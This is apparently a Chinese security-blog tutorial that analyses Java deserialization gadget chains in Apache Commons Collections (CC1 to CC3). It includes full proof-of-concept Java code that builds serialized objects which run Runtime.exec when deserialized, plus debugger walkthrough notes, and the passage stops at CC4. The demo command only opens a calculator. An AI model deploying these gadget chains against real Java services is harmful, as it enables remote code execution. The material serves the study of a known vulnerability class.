\u5173\u4e8e\u7b2c\u4e00\u6b65\uff0c\u4e3b\u8981\u6709\u4e24\u79cd\u65b9\u6cd5\uff1a<\/p>\n\n\n\n
- ChainedTransformer \u6784\u9020<\/li>
- javassist\u52a8\u6001\u7f16\u7a0b\u751f\u6210\u4e00\u4e2a\u6267\u884c\u547d\u4ee4\u7684\u7c7b\u3002\u8f6c\u5316\u6210byte[]\u7c7b\u578b\uff0c\u586b\u5145\u5230\u67d0\u4e9b\u7c7b(TemplatesImpl)\u4e2d\u7684\u201c_bytecodes\u201d\u53d8\u91cf\u91cc<\/li><\/ol>\n\n\n\n
\u5173\u4e8e\u7b2c\u4e8c\u6b65\uff0c\u4e3b\u8981\u6709\u4e24\u79cd\u65b9\u6cd5\uff1a<\/p>\n\n\n\n
- \u4e09\u5927Map:LazyMap,TiedMapEntry,HashMap \uff0c\u5bf9\u5e94\u7b2c\u4e00\u6b65\u7684\u7b2c\u4e00\u79cd\u65b9\u6cd5\u3002<\/li>
- TemplatesImpl\u7c7b\u79cd\u7684_bytecodes\u53ef\u88ab\u586b\u5145\u6076\u610f\u7c7b\u3002\u5bf9\u5e94\u7b2c\u4e00\u6b65\u7684\u7b2c\u4e8c\u79cd\u65b9\u6cd5\u3002<\/li><\/ol>\n\n\n\n
\u5173\u4e8e\u7b2c\u4e09\u6b65\uff0c\u5c31\u662f\u7528\u53cd\u5c04\u628a\u75c5\u6bd2\u586b\u5145\u5230vulnerable\u7684\u7c7b\u4e2d\uff0creadObject\u7684\u65f6\u5019\u89e6\u53d1\u75c5\u6bd2\u3002<\/p>\n\n\n\n
\n\n\n\n\u4e0b\u9762\u7b80\u5355\u4e86\u89e3\u4e00\u4e0b\u7b2c\u4e00\u6b65\u7684\u539f\u7406\u3002<\/p>\n\n\n\n
\u901a\u8fc7ChainedTransformer \u6784\u9020\u75c5\u6bd2\u7684demo:<\/p>\n\n\n\n
import org.apache.commons.collections.Transformer;\nimport org.apache.commons.collections.functors.ChainedTransformer;\nimport org.apache.commons.collections.functors.ConstantTransformer;\nimport org.apache.commons.collections.functors.InvokerTransformer;\n\npublic class ChainedTransformerTest {\n\tpublic static void main(String[] args) {\n\t\tTransformer[] transformers = new Transformer[] {\n\t\t\t\t\/*\n\t\t\t\t * ConstantTransformer: Transformer implementation that returns the same\n\t\t\t\t * constant each time.\uff08\u628a\u4e00\u4e2a\u5bf9\u8c61\u8f6c\u5316\u4e3a\u5e38\u91cf\uff0c\u5e76\u8fd4\u56de\uff09\n\t\t\t\t *\/\n\t\t\t\tnew ConstantTransformer(Runtime.class),\n\t\t\t\tnew InvokerTransformer(\"getMethod\", new Class[] { String.class, Class[].class },\n\t\t\t\t\t\tnew Object[] { \"getRuntime\", new Class[0] }),\n\t\t\t\tnew InvokerTransformer(\"invoke\", new Class[] { Object.class, Object[].class },\n\t\t\t\t\t\tnew Object[] { null, new Object[0] }),\n\t\t\t\tnew InvokerTransformer(\"exec\", new Class[] { String.class }, new Object[] { \"gnome-calculator\" }) };\n\t\t\/\/ Runtime.getRuntime().exec(\"calc\");\n\t\t\/*\n\t\t * ChainedTransformer: Transformer implementation that chains the specified\n\t\t * transformers together. \uff08\u628atransformer\u8fde\u63a5\u6210\u4e00\u6761\u94fe\uff0c\u5bf9\u4e00\u4e2a\u5bf9\u8c61\u4f9d\u6b21\u901a\u8fc7\u94fe\u6761\u5185\u7684\u6bcf\u4e00\u4e2atransformer\u8fdb\u884c\u8f6c\u6362\uff09\n\t\t *\/\n\t\tTransformer chainedTransformer = new ChainedTransformer(transformers);\n\t\tchainedTransformer.transform(null);\n\t}\n}\n<\/code><\/pre>\n\n\n\n\u6700\u7ec8 transform() \u65b9\u6cd5 \u4f1a\u5728Gnome\u684c\u9762\u73af\u5883\u4e0b\u7684kali\u4e2d\u5f39\u51fa\u8ba1\u7b97\u5668\u3002<\/p>\n\n\n\n
\u5173\u4e8e\u4e3a\u4ec0\u4e48\u8981\u7528ChainedTransformer\uff0c\u5f15\u7528\u300a\u6d45\u6790 Java \u5e8f\u5217\u5316\u548c\u53cd\u5e8f\u5217\u5316<\/a>\u300b(\u5f53\u4e2d\u7684\u8bf4\u6cd5\u662f\u201c\u901a\u8fc7\u53cd\u5c04\u6280\u672f\u83b7\u53d6\u5bf9\u8c61\u8c03\u7528\u51fd\u6570\u90fd\u4f1a\u5b58\u5728\u4e00\u4e2a\u4e0a\u4e0b\u6587\u73af\u5883\uff0c\u4f7f\u7528\u94fe\u5f0f\u7ed3\u6784\u7684\u8bed\u53e5\u53ef\u4ee5\u4fdd\u8bc1\u6267\u884c\u8fc7\u7a0b\u4e2d\u8fd9\u4e2a\u4e0a\u4e0b\u6587\u662f\u4e00\u81f4\u7684\u3002\u201d<\/p>\n\n\n\n
<\/p>\n\n\n\n
\u901a\u8fc7javassist\u52a8\u6001\u7f16\u7a0b\u751f\u6210\u4e00\u4e2a\u6267\u884c\u547d\u4ee4\u7684\u7c7b\u7684demo:<\/p>\n\n\n\n
import java.io.IOException;\n\nimport com.hans.CommonCollection2.CommonsCollections2.Placeholder;\n\nimport javassist.CannotCompileException;\nimport javassist.ClassClassPath;\nimport javassist.ClassPool;\nimport javassist.CtClass;\nimport javassist.CtMethod;\nimport javassist.NotFoundException;\n\npublic class Javassist {\n\n\tpublic static class Hello {\n\t public void say() {\n\t System.out.println(\"Hello\");\n\t }\n\t}\n\t\n\tpublic static void main(String[] args) throws CannotCompileException, NotFoundException, InstantiationException, IllegalAccessException, ClassNotFoundException, IOException {\n\t\t\/\/ TODO Auto-generated method stub\n\t\tString AbstractTranslet = \"com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet\";\n\t\t\n\t\tClassPool cp = ClassPool.getDefault();\n\t\tcp.insertClassPath(new ClassClassPath(Placeholder.class));\n\t\tcp.insertClassPath(new ClassClassPath(Class.forName(AbstractTranslet)));\n\t\tCtClass cc = cp.get(Hello.class.getName());\n\t\tcc.setSuperclass(cp.get(Class.forName(AbstractTranslet).getName()));\n\t\t\/\/ 2.\u5728\u81ea\u5b9a\u4e49\u6076\u610f\u7c7b\u4e2d\u6dfb\u52a0\u9759\u6001\u6a21\u5757\uff0c\u4e00\u53e5Rumtime.exec\uff0c\u547d\u4ee4\u4ece\u5916\u90e8\u5f15\u5165\n\t\t\/\/ \u6ee1\u8db3\u6761\u4ef66\uff1a\u9700\u8981\u6267\u884c\u7684\u6076\u610f\u4ee3\u7801\u5199\u5728\u7c7b\u7684\u9759\u6001\u65b9\u6cd5\u6216\u6784\u9020\u65b9\u6cd5\u4e2d\u3002\n\t\tcc.makeClassInitializer().insertAfter(\"java.lang.Runtime.getRuntime().exec(\\\"gnome-calculator\\\");\"); \/\/ \u8fd9\u91cc insertBefore \u8fd8\u662f After \u90fd\u4e00\u6837\n\t\t\/\/ 3.\u8bbe\u7f6e\u4e00\u4e2a\u552f\u4e00\u6027\u7684class\u540d\u79f0\n\t\tcc.setName(\"com.hans.CommonCollections.\" + System.currentTimeMillis());\n\n\t\tClass c = cc.toClass();\n Hello h = (Hello)c.newInstance();\n \/\/h.say();\n\t}\n}<\/code><\/pre>\n\n\n\n
\n\n\n\n\u901a\u8fc7\u4e00\u4e2ademo\u7406\u89e3\u7b2c\u4e8c\u6b65\u7684\u53d7\u4f53\u662f\u5e72\u561b\u7684<\/p>\n\n\n\n
import java.util.HashMap;\nimport java.util.Iterator;\nimport java.util.Map;\n\nimport org.apache.commons.collections.Transformer;\nimport org.apache.commons.collections.functors.ChainedTransformer;\nimport org.apache.commons.collections.functors.ConstantTransformer;\nimport org.apache.commons.collections.functors.InvokerTransformer;\nimport org.apache.commons.collections.map.TransformedMap;\n\npublic class ChainedTransformerTest {\n\tpublic static void main(String[] args) {\n\t Transformer[] transformers = new Transformer[]{\n\t\t\/*\n\t\t * ConstantTransformer:\n\t\t * Transformer implementation that returns the same constant each time.\uff08\u628a\u4e00\u4e2a\u5bf9\u8c61\u8f6c\u5316\u4e3a\u5e38\u91cf\uff0c\u5e76\u8fd4\u56de\uff09\n\t\t * *\/\n\t\t new ConstantTransformer(Runtime.class),\n\t\t new InvokerTransformer(\"getMethod\", new Class[] { String.class, Class[].class }, new Object[] {\"getRuntime\", new Class[0] }),\n\t\t new InvokerTransformer(\"invoke\", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0]}),\n\t\t new InvokerTransformer(\"exec\", new Class[]{String.class}, new Object[]{\"gnome-calculator\"})\n\t };\n\t \/\/Runtime.getRuntime().exec(\"calc\");\n\t \/*\n\t * ChainedTransformer:\n\t * Transformer implementation that chains the specified transformers together.\n\t * \uff08\u628atransformer\u8fde\u63a5\u6210\u4e00\u6761\u94fe\uff0c\u5bf9\u4e00\u4e2a\u5bf9\u8c61\u4f9d\u6b21\u901a\u8fc7\u94fe\u6761\u5185\u7684\u6bcf\u4e00\u4e2atransformer\u8fdb\u884c\u8f6c\u6362\uff09\n\t * *\/\n\t Transformer chainedTransformer = new ChainedTransformer(transformers);\n\t \n\t \/\/ code execute;\n\t \/\/chainedTransformer.transform(null);\n\t \n\t Map inMap = new HashMap();\n\t inMap.put(\"key\", \"value\");\n\t Map outMap = TransformedMap.decorate(inMap, null, chainedTransformer);\/\/\u751f\u6210\n\t \/*\n\t * Map\u4e2d\u7684\u4efb\u610f\u9879\u7684Key\u6216\u8005Value\u88ab\u4fee\u6539\uff0c\u76f8\u5e94\u7684Transformer(keyTransformer\u6216\u8005valueTransformer)\u7684transform\u65b9\u6cd5\u5c31\u4f1a\u88ab\u8c03\u7528\u3002\n\t * *\/\n\t for (Iterator iterator = outMap.entrySet().iterator(); iterator.hasNext();){\n\t Map.Entry entry = (Map.Entry) iterator.next();\n\t entry.setValue(\"123\");\n\t }\n\t\t\n\t}\n}<\/code><\/pre>\n\n\n\n\u5728entry.setValue(\"123\");\u5904\u4e0b\u65ad\u70b9\uff0c\u53ef\u4ee5\u770b\u5230\uff0c\u5f53\u6076\u610f\u7684chainedTransformer\u901a\u8fc7decorate()\u65b9\u6cd5\u586b\u5165Map\u5bf9\u8c61\u540e\uff0c\u5728\u8fdb\u884cMap\u7684setValue\u64cd\u4f5c\u65f6\uff0c\u4f1a\u89e6\u53d1transform()\u65b9\u6cd5\uff0c\u89e6\u53d1\u4ee3\u7801\u6267\u884c\u3002<\/p>\n\n\n\n
![\"\"](\"https:\/\/blog.73007300.xyz\/wp-content\/uploads\/2020\/04\/\u56fe\u7247.png\")
<\/figure>\n\n\n\n\u4f46\u662f\u53d7\u4f53\u7684setValue()\u65b9\u6cd5\u4e5f\u662f\u9700\u8981\u89e6\u53d1\u7684\uff0c\u56e0\u6b64\u9700\u8981\u4e00\u4e2a\u53ef\u4ee5\u901a\u8fc7readObject()\u89e6\u53d1\u75c5\u6bd2\u7684\u5bbf\u4e3b\u3002<\/p>\n\n\n\n
\n\n\n\n\u7531\u4e8eCommonsCollections 1-7\u601d\u8def\u90fd\u5dee\u4e0d\u591a\uff0c\u90fd\u53ef\u4ee5\u5957\u516c\u5f0f\uff08\u4e09\u6b65\u8d70\uff09\uff0c\u6240\u4ee5\u53ea\u5206\u6790CommonsCollections1\uff0c\u5176\u4ed6\u7684 \u7528\u4e0a\u9762\u63d0\u5230\u7684\u65b9\u6cd5\u8fc7\u4e00\u4e0b\u3002
\u4e0b\u9762\u770b\u5177\u4f53\u4ee3\u7801\u3002
CommonsCollections1.java<\/p>\n\n\n\nimport java.io.FileInputStream;\nimport java.io.FileOutputStream;\nimport java.io.ObjectInputStream;\nimport java.io.ObjectOutputStream;\nimport java.lang.reflect.Constructor;\nimport java.lang.reflect.InvocationHandler;\nimport java.lang.reflect.Proxy;\nimport java.util.HashMap;\nimport java.util.Map;\n\nimport org.apache.commons.collections.Transformer;\nimport org.apache.commons.collections.functors.ChainedTransformer;\nimport org.apache.commons.collections.functors.ConstantTransformer;\nimport org.apache.commons.collections.functors.InvokerTransformer;\n\npublic class CommonsCollections1 {\n public static void main(String[] args) throws Exception {\n \t\n \t\/*\u7b2c\u4e00\u6b65 \u51c6\u5907\u75c5\u6bd2*\/\n Transformer[] transformers = new Transformer[]{\n new ConstantTransformer(java.lang.Runtime.class),\n new InvokerTransformer(\"getMethod\", new Class[]{String.class, Class[].class}, new Object[]{\"getRuntime\", new Class[]{}}),\n new InvokerTransformer(\"invoke\", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[]{}}),\n new InvokerTransformer(\"exec\", new Class[]{String[].class}, new Object[]{new String[]{\"gnome-calculator\"}}),\n };\n\n ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);\n \n \/*\u7b2c\u4e8c\u6b65 \u5bfb\u627e\u53d7\u4f53*\/\n Constructor constructor = Class.forName(\"org.apache.commons.collections.map.LazyMap\").getDeclaredConstructor(Map.class, Transformer.class);\n constructor.setAccessible(true);\n \n HashMap hashMap = new HashMap<String, String>();\n Object lazyMap = constructor.newInstance(hashMap, chainedTransformer);\n \n \/*\u7b2c\u4e09\u6b65 \u586b\u5145\u75c5\u6bd2*\/\n constructor = Class.forName(\"sun.reflect.annotation.AnnotationInvocationHandler\").getDeclaredConstructor(Class.class, Map.class);\n \/\/ \u56e0\u4e3a\u6784\u9020\u65b9\u6cd5\u4e0d\u662f public, \u53ea\u80fd\u901a\u8fc7\u53cd\u5c04\u6784\u9020\u51fa\u6765\n constructor.setAccessible(true);\n InvocationHandler invo = (InvocationHandler) constructor.newInstance(Deprecated.class, lazyMap);\n \n Object proxy = Proxy.newProxyInstance(invo.getClass().getClassLoader(), new Class[]{Map.class}, invo);\n\n constructor = Class.forName(\"sun.reflect.annotation.AnnotationInvocationHandler\").getDeclaredConstructor(Class.class, Map.class);\n constructor.setAccessible(true);\n Object obj = constructor.newInstance(Deprecated.class, proxy);\n\n \/\/\u5c06\u6076\u610f\u5bf9\u8c61\u5b58\u50a8\u4e3a\u5b57\u8282\u7801\n FileOutputStream fos = new FileOutputStream(System.getProperty(\"user.dir\") + \"\/resources\/CommonCollections1.ser\");\n ObjectOutputStream oos = new ObjectOutputStream(fos);\n oos.writeObject(obj);\n oos.flush();\n oos.close();\n \/\/\u8bfb\u53d6\u6076\u610f\u5bf9\u8c61\u5b57\u8282\u7801\u5e76\u8fdb\u884c\u53cd\u5e8f\u5217\u5316\u64cd\u4f5c\n FileInputStream fis = new FileInputStream(System.getProperty(\"user.dir\") + \"\/resources\/CommonCollections1.ser\");\n ObjectInputStream ois = new ObjectInputStream(fis);\n Object evilObject = ois.readObject();\n ois.close();\n }\n}\n<\/code><\/pre>\n\n\n\n\u5728 ois.readObject(); \u5904\u4e0b\u65ad\u70b9\u3002Object obj = readObject0(false); \u8ddf\u8fdb<\/p>\n\n\n\n
![\"\"](\"https:\/\/blog.73007300.xyz\/wp-content\/uploads\/2020\/04\/\u56fe\u7247-1.png\")
<\/figure>\n\n\n\nTC_OBJECT\u6761\u4ef6\u8ddf\u8fdb\uff1a<\/p>\n\n\n\n
![\"\"](\"https:\/\/blog.73007300.xyz\/wp-content\/uploads\/2020\/04\/\u56fe\u7247-2.png\")
<\/figure>\n\n\n\nreadSerialData(obj, desc);\u8ddf\u8fdb<\/p>\n\n\n\n
![\"\"](\"https:\/\/blog.73007300.xyz\/wp-content\/uploads\/2020\/04\/\u56fe\u7247-3.png\")
<\/figure>\n\n\n\n\u5728\u8fd9\u4e2a\u65b9\u6cd5\u91cc\u5c31\u662f\u904d\u5386\u5904\u7406Object\u5bf9\u8c61
slotDesc.invokeReadObject(obj, this); \u8ddf\u8fdb\uff0c\u5176\u4ed6\u53ef\u4ee5\u4e00\u8defF6<\/p>\n\n\n\n![\"\"](\"https:\/\/blog.73007300.xyz\/wp-content\/uploads\/2020\/04\/\u56fe\u7247-4.png\")
<\/figure>\n\n\n\n\u76f4\u5230\u8fdb\u5165\u6211\u4eec\u7684\u4e3b\u89d2\uff0c\u5bbf\u4e3bAnnotationInvocationHandler<\/p>\n\n\n\n
![\"\"](\"https:\/\/blog.73007300.xyz\/wp-content\/uploads\/2020\/04\/\u56fe\u7247-5.png\")
<\/figure>\n\n\n\n\u679c\u7136\u5728readObject\u4e2d\u6709\u5bf9Map\u5bf9\u8c61\u7684\u64cd\u4f5c\u3002
\u5f53\u8fdb\u5165AnnotationInvocationHandler\u7684invoke\u65b9\u6cd5\uff0c\u8ddf\u8fdbObject var6 = this.memberValues.get(var4);
\u55ef\uff0c\u7136\u540e\u5c31\u662f\u89e6\u53d1\u75c5\u6bd2\u7684transform()\u4e86\u3002<\/p>\n\n\n\n![\"\"](\"https:\/\/blog.73007300.xyz\/wp-content\/uploads\/2020\/04\/\u56fe\u7247-6.png\")
<\/figure>\n\n\n\n\u56fe\u4e2d iTransformers \u5c31\u662f\u7528\u53cd\u5c04\u586b\u5145\u8fdbAnnotationInvocationHandler\u7684\u6076\u610f\u94fe\u3002
\u8fd9\u91cc\u7684LazyMap\u5176\u5b9e\u5c31\u50cf\u662f\u75c5\u6bd2\u7684\u53d7\u4f53\u4e00\u6837\uff0c\u5c31\u50cf\u662f\u6700\u8fd1\u65b0\u51a0\u75c5\u6bd2\u6700\u5148\u611f\u67d3\u4eba\u7684\u80ba\u90e8\u4e00\u6837\u3002
\u800cAnnotationInvocationHandler\u5c31\u50cf\u662f\u4eba\u4f53\u4e00\u6837\uff0c\u91cc\u9762\u88c5\u7684\u611f\u67d3\u7684LazyMap\uff0c\u6267\u884c\u5e8f\u5217\u5316\u5de5\u4f5c\u7684\u65f6\u5019\u5c31\u4f1a\u89e6\u53d1\u80ba\u90e8\u6fc0\u6d3b\u75c5\u6bd2\u3002<\/p>\n\n\n\n\u4e09\u6b65\u603b\u7ed3\uff1a<\/p>\n\n\n\n
- \u51c6\u5907\u75c5\u6bd2\u3002\u5229\u7528ChainedTransformer\u5236\u9020\u51fa\u53ef\u4ee5\u6267\u884c\u4ee3\u7801\u7684\u5bf9\u8c61<\/li>
- \u5bfb\u627e\u53d7\u4f53\u3002\u628a\u75c5\u6bd2\u586b\u5145\u5230LazyMap,\u8fd9\u4e2aLazyMap\u5c31\u884c\u4eba\u7684\u80ba\u90e8\u4e00\u6837\uff0c\u4f5c\u4e3a\u75c5\u6bd2\u53d7\u4f53\u3002<\/li>
- \u586b\u5145\u75c5\u6bd2\u3002\u628a\u53d7\u611f\u67d3\u7684\u80ba\u7528\u53cd\u5c04\u7684\u6280\u672f\u88c5\u5230\u5bbf\u4e3b\uff08AnnotationInvocationHandler\uff09\u4e0a\u3002<\/li><\/ol>\n\n\n\n
\n\n\n\n\u4e0b\u9762\u7528\u8fd9\u4e2a\u65b9\u6cd5\u628a 2-7\u7684POC\u6982\u62ec\u4e00\u4e0b\uff1a<\/p>\n\n\n\n
CommonsCollections2.java<\/p>\n\n\n\n
import javassist.ClassClassPath;\nimport javassist.ClassPool;\nimport javassist.CtClass;\n\nimport org.apache.commons.collections4.Transformer;\nimport org.apache.commons.collections4.comparators.TransformingComparator;\nimport org.apache.commons.collections4.functors.InvokerTransformer;\n\nimport java.io.FileInputStream;\nimport java.io.FileOutputStream;\nimport java.io.ObjectInputStream;\nimport java.io.ObjectOutputStream;\nimport java.lang.reflect.Field;\nimport java.util.PriorityQueue;\n\npublic class CommonsCollections2 {\n public static class Placeholder {\n }\n\n public static void main(String[] args) throws Exception {\n String AbstractTranslet = \"com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet\";\n String TemplatesImpl = \"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\";\n \n \/*\u7b2c\u4e00\u6b65 \u51c6\u5907\u75c5\u6bd2*\/\n \n\t\t\/\/ 1.\u4f7f\u7528\u4e00\u4e2a\u81ea\u5b9a\u4e49\u7684\u6ee1\u8db3\u6761\u4ef6\u7684\u6076\u610f\u6a21\u677f\u7c7bStubTransletPayload\n\t\t\/\/ \u6ee1\u8db3\u6761\u4ef65\uff1a\u6076\u610f\u7c7b\u7ee7\u627fcom.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet\u3002\n \/\/Javassist\u5305\u4e2d\u5efa\u7acb\u4e00\u4e2a\u5bb9\u5668\n ClassPool classPool = ClassPool.getDefault();\n \/\/\u6dfb\u52a0\u81ea\u5b9a\u4e49\u7684\u6076\u610f\u6a21\u677f\u7c7bStubTransletPayload\u7684\u8def\u5f84\u81f3\u5bb9\u5668\u7684Classpath\n classPool.insertClassPath(new ClassClassPath(Placeholder.class));\n classPool.insertClassPath(new ClassClassPath(Class.forName(AbstractTranslet)));\n \n \/\/\u4eceClasspath\u4e2d\u5bfb\u627e\u81ea\u5b9a\u4e49\u7684\u6076\u610f\u6a21\u677f\u7c7bStubTransletPayload\uff0c\u5f15\u5165\u5b83\uff0c\u4e4b\u540e\u5bf9\u5b83\u8fdb\u884c\u4fee\u6539\n CtClass placeholder = classPool.get(Placeholder.class.getName());\n placeholder.setSuperclass(classPool.get(Class.forName(AbstractTranslet).getName()));\n\t\t\/\/ 2.\u5728\u81ea\u5b9a\u4e49\u6076\u610f\u7c7b\u4e2d\u6dfb\u52a0\u9759\u6001\u6a21\u5757\uff0c\u4e00\u53e5Rumtime.exec\uff0c\u547d\u4ee4\u4ece\u5916\u90e8\u5f15\u5165\n\t\t\/\/ \u6ee1\u8db3\u6761\u4ef66\uff1a\u9700\u8981\u6267\u884c\u7684\u6076\u610f\u4ee3\u7801\u5199\u5728\u7c7b\u7684\u9759\u6001\u65b9\u6cd5\u6216\u6784\u9020\u65b9\u6cd5\u4e2d\u3002\n placeholder.makeClassInitializer().insertAfter(\"java.lang.Runtime.getRuntime().exec(\\\"gnome-calculator\\\");\"); \/\/ \u8fd9\u91cc insertBefore \u8fd8\u662f After \u90fd\u4e00\u6837\n \/\/ 3.\u8bbe\u7f6e\u4e00\u4e2a\u552f\u4e00\u6027\u7684class\u540d\u79f0\n placeholder.setName(\"com.hans.CommonCollection2.\" + System.currentTimeMillis());\n\n \/\/ 4. \u628a\u6211\u4eec\u7684\u81ea\u5b9a\u4e49\u7684\u6076\u610f\u7c7b\u8f6c\u5316\u6210byte\u6570\u7ec4\u6a21\u5f0f\n byte[] bytecode = placeholder.toBytecode();\n \n \/*\u7b2c\u4e8c\u6b65 \u5bfb\u627e\u53d7\u4f53*\/\n \n \/\/ \u52a8\u6001\u83b7\u53d6 TemplatesImpl \u5bf9\u8c61\n Object templates = Class.forName(TemplatesImpl).getConstructor(new Class[]{}).newInstance();\n \/\/ \u53cd\u5c04\u7684\u65b9\u5f0f\u4fee\u6539\u5bf9\u8c61\n Field fieldByteCodes = templates.getClass().getDeclaredField(\"_bytecodes\");\n fieldByteCodes.setAccessible(true);\n fieldByteCodes.set(templates, new byte[][]{bytecode});\n\n Field fieldName = templates.getClass().getDeclaredField(\"_name\");\n fieldName.setAccessible(true);\n fieldName.set(templates, \"hans\");\n\n \/*\u7b2c\u4e09\u6b65 \u75c5\u6bd2\u586b\u5145\u5230\u5bbf\u4e3b\u3002*\/\n \n \/\/ InvokerTransformer(final String methodName, final Class<?>[] paramTypes, final Object[] args)\n \/\/ comparator \u662f\u540e\u7eed\u65b9\u6cd5\u8c03\u7528\u7684\u53c2\u6570\u3002\n InvokerTransformer<?, ?> invokerTransformer = new InvokerTransformer<Object, Object>(\"newTransformer\", new Class[]{}, new Object[]{});\n TransformingComparator<?, ?> comparator = new TransformingComparator<Object, Object>((Transformer<? super Object, ? extends Object>) invokerTransformer);\n PriorityQueue<Integer> queue = new PriorityQueue<Integer>(2);\n queue.add(1);\n queue.add(1);\n\n Field field = PriorityQueue.class.getDeclaredField(\"queue\");\n field.setAccessible(true);\n Object[] innerArr = (Object[]) field.get(queue);\n innerArr[0] = templates;\n innerArr[1] = templates;\n\n field = PriorityQueue.class.getDeclaredField(\"comparator\");\n field.setAccessible(true);\n \/\/ \u5bbf\u4e3b\u88ab\u586b\u5145\u8fdb PriorityQueue\n field.set(queue, comparator);\n\n ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(System.getProperty(\"user.dir\") + \"\/resources\/CommonCollections2.ser\"));\n oos.writeObject(queue);\n oos.close();\n \n FileInputStream fis = new FileInputStream(System.getProperty(\"user.dir\") + \"\/resources\/CommonCollections2.ser\");\n ObjectInputStream ois = new ObjectInputStream(fis);\n Object newObj = ois.readObject();\n ois.close();\n }\n}\n<\/code><\/pre>\n\n\n\njavassist \u52a8\u6001\u751f\u6210\u75c5\u6bd2\uff0cTemplatesImpl\u4f5c\u4e3a\u53d7\u4f53\uff0cPriorityQueue\u4f5c\u4e3a\u5bbf\u4e3b\u3002<\/p>\n\n\n\n
CommonsCollections3.java<\/p>\n\n\n\n
import javassist.ClassClassPath;\nimport javassist.ClassPool;\nimport javassist.CtClass;\nimport org.apache.commons.collections.Transformer;\nimport org.apache.commons.collections.functors.ChainedTransformer;\nimport org.apache.commons.collections.functors.ConstantTransformer;\nimport org.apache.commons.collections.functors.InstantiateTransformer;\nimport javax.xml.transform.Templates;\n\nimport java.io.FileInputStream;\nimport java.io.FileOutputStream;\nimport java.io.ObjectInputStream;\nimport java.io.ObjectOutputStream;\nimport java.io.Serializable;\nimport java.lang.reflect.Constructor;\nimport java.lang.reflect.Field;\nimport java.lang.reflect.InvocationHandler;\nimport java.lang.reflect.Proxy;\nimport java.util.HashMap;\nimport java.util.Map;\n\npublic class CommonsCollections3 {\n public static class Placeholder implements Serializable {\n }\n\n public static void main(String[] args) throws Exception {\n String AbstractTranslet = \"com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet\";\n String TemplatesImpl = \"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\";\n String TrAXFilter = \"com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter\";\n\n \/*\u7b2c\u4e00\u6b65 \u51c6\u5907\u75c5\u6bd2*\/\n ClassPool classPool = ClassPool.getDefault();\n classPool.insertClassPath(new ClassClassPath(CommonsCollections3.Placeholder.class));\n classPool.insertClassPath(new ClassClassPath(Class.forName(AbstractTranslet)));\n\n CtClass placeholder = classPool.get(CommonsCollections3.Placeholder.class.getName());\n placeholder.setSuperclass(classPool.get(Class.forName(AbstractTranslet).getName()));\n placeholder.makeClassInitializer().insertAfter(\"java.lang.Runtime.getRuntime().exec(\\\"gnome-calculator\\\");\");\n placeholder.setName(\"demo.rmb122.\" + System.currentTimeMillis());\n\n byte[] bytecode = placeholder.toBytecode();\n \n \n \/*\u7b2c\u4e8c\u6b65 \u5bfb\u627e\u53d7\u4f53*\/\n Object templates = Class.forName(TemplatesImpl).getConstructor(new Class[]{}).newInstance();\n Field fieldByteCodes = templates.getClass().getDeclaredField(\"_bytecodes\");\n fieldByteCodes.setAccessible(true);\n fieldByteCodes.set(templates, new byte[][]{bytecode});\n\n Field fieldName = templates.getClass().getDeclaredField(\"_name\");\n fieldName.setAccessible(true);\n fieldName.set(templates, \"hans\");\n \n \n \/*\u7b2c\u4e09\u6b65 \u75c5\u6bd2\u586b\u5145\u5230\u5bbf\u4e3b\u3002*\/\n \/* \u8fd9\u4e00\u6b65\u628a\u4e09\u6b65\u53c8\u8d70\u4e86\u4e00\u904d *\/\n \/*3.1 \u51c6\u5907\u8f7d\u4f53*\/\n Transformer[] transformers = new Transformer[]{\n new ConstantTransformer(Class.forName(TrAXFilter)),\n new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templates}),\n };\n\n ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);\n \/*3.2 \u5bfb\u627e\u53d7\u4f53*\/\n \/\/ \u53cd\u5c04\u7684\u65b9\u6cd5\u83b7\u53d6\u4e00\u4e2alazyMap\n Constructor constructor = Class.forName(\"org.apache.commons.collections.map.LazyMap\").getDeclaredConstructor(Map.class, Transformer.class);\n constructor.setAccessible(true);\n HashMap hashMap = new HashMap<String, String>();\n Object lazyMap = constructor.newInstance(hashMap, chainedTransformer);\n\n \/*\u7b2c\u4e09\u6b65 \u75c5\u6bd2\u586b\u5145\u5230\u5bbf\u4e3b\u3002*\/\n constructor = Class.forName(\"sun.reflect.annotation.AnnotationInvocationHandler\").getDeclaredConstructor(Class.class, Map.class);\n constructor.setAccessible(true);\n InvocationHandler invo = (InvocationHandler) constructor.newInstance(Deprecated.class, lazyMap);\n Object proxy = Proxy.newProxyInstance(invo.getClass().getClassLoader(), new Class[]{Map.class}, invo);\n \n constructor = Class.forName(\"sun.reflect.annotation.AnnotationInvocationHandler\").getDeclaredConstructor(Class.class, Map.class);\n constructor.setAccessible(true);\n Object obj = constructor.newInstance(Deprecated.class, proxy);\n\n ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(System.getProperty(\"user.dir\") + \"\/resources\/CommonCollections3.ser\"));\n oos.writeObject(obj);\n oos.close();\n \n FileInputStream fis = new FileInputStream(System.getProperty(\"user.dir\") + \"\/resources\/CommonCollections3.ser\");\n ObjectInputStream ois = new ObjectInputStream(fis);\n Object newObj = ois.readObject();\n ois.close();\n }\n}<\/code><\/pre>\n\n\n\n\u8fd9\u4e00\u6b65\u7684\u8bdd\uff0c\u53ef\u4ee5\u7406\u89e3\u4e3a\u5148\u5f80\u7ec6\u80de(chainedTransformer)\u5185\u7684\u7ec4\u7ec7(InstantiateTransformer)\u586b\u5145\u4e86\u75c5\u6bd2\uff0c\u518d\u628a\u53d7\u611f\u67d3\u7684\u7ec6\u80de\u586b\u5145\u5230\u80ba\u90e8(LazyMap),\u6700\u540e\u53cd\u5c04\u5230\u5bbf\u4e3b\uff08AnnotationInvocationHandler\uff09\u3002
\u66f4\u50cf\u662f1\u548c2\u7684\u7efc\u5408\u5229\u7528\u3002<\/p>\n\n\n\nCommonsCollections4.java<\/p>\n\n\n\n
